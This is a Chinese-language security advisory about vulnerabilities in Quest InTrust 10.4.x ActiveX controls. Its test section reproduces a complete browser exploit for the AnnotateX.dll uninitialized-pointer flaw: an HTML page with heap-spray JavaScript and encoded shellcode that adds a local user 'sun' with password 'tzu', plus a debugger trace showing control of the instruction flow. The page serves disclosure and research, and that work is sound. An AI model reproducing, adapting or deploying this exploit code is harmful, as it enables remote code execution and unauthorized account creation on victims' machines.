发布日期：2012-03-28
更新日期：2013-01-11

受影响系统：

Quest InTrust 10.4.x

描述：

---

BUGTRAQ  ID: 52765
CVE(CAN) ID: CVE-2012-5896

Quest InTrust是安全及合规性事件日志管理程序。

Quest InTrust 10.4.x在ARDoc ActiveX Control (ARDoc.dll)内使用了不安全的方法，可使远程攻击者通过调用带特制 "bstrFileName" 参数的 "SaveToFile()" 方法，利用此漏洞用导出文档内容覆盖任意文件。

<*来源：nospam
  
  链接：http://secunia.com/advisories/48566
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Quest InTrust 10.4.x Annotation Objects ActiveX Control
AnnotateX.dll Uninitialized Pointer Remote Code Execution


homepage: http://www.quest.com/intrust/

description: "InTrust securely collects, stores, reports and
alerts on event log data from Windows, Unix and Linux systems,
helping you comply with external regulations, internal policies
and security best practices."


download url of a test version:
http://www.quest.com/downloads/

file tested: Quest_InTrust---Full-Package_104.zip


Background:

The mentioned product installs an ActiveX control
with the following settings:

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so
Internet Explorer will allow scripting of this control
from remote.

Vulnerability:

By invoking the Add() method is
possible to call inside a memory region of choice
set by the attacker through ex. heap spray or other
tecniques.

Example code:

<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script>
obj.Add(0x76767676,1);
</script>

...
eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????
...

You are in control of eax: fully exploitable.
As attachment, proof of concept code.



<!--
Quest InTrust 10.4.x Annotation Objects ActiveX Control
(ANNOTATEX.DLL) Uninitialized Pointer Remote Code Execution PoC
(ie7)

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1000;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
obj.Add(0x76767676,1); //this should result in an address beginning with 0x1d1d[..]
</script>

建议：

---

厂商补丁：

Quest
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.quest.com/intrust/

参考：
BUGTRAQ:20120328 Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
URL:http://archives.neohapsis.com/archives/bugtraq/2012-03/0153.html
EXPLOIT-DB:18674
URL:http://www.exploit-db.com/exploits/18674
MISC:http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/intrust_annotatex_add.rb
MISC:http://packetstormsecurity.org/files/111312/Quest-InTrust-10.4.x-Annotation-Objects-Code-Execution.html
MISC:http://packetstormsecurity.org/files/111853/Quest-InTrust-Annotation-Objects-Uninitialized-Pointer.html
BID:52765
URL:http://www.securityfocus.com/bid/52765
OSVDB:80662
URL:http://osvdb.org/80662
SECUNIA:48566
URL:http://secunia.com/advisories/48566
XF:intrust-annotatex-code-execution(74448)
URL:http://xforce.iss.net/xforce/xfdb/74448

浏览次数：2183
严重程度：0（网友投票）